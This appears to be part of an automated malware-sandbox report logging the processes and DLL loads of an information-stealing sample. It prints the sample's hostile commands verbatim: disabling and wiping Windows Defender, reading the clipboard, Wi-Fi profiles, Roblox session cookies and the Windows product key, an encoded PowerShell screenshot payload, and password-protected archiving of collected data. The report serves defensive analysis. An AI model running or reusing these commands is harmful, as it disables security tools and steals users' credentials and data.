              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: libffi-7.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: libssl-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: libcrypto-1_1.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
